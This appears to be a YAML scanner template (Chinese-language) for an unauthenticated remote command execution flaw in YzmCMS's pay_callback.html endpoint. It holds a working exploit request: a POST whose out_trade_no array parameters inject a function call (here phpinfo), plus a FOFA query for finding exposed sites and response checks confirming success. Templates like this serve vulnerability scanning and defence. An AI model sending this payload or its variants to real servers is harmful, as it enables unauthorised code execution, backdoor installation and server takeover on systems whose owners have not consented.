product: YzmCMS
vName: YzmCMS pay_callback.html远程命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统指令，写入后门文件，最终可获取服务器权限。
version: ''
note: ''
search:
  FOFA: app="yzmcms"
protocol: http
link: https://github.com/wy876/POC/blob/main/YzmCMS/YzmCMS%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8pay_callback%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /pay/index/pay_callback.html
      data: out_trade_no[0]=eq&out_trade_no[1]=1&out_trade_no[2]=phpinfo
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - PHP Version
              - System
            logic: and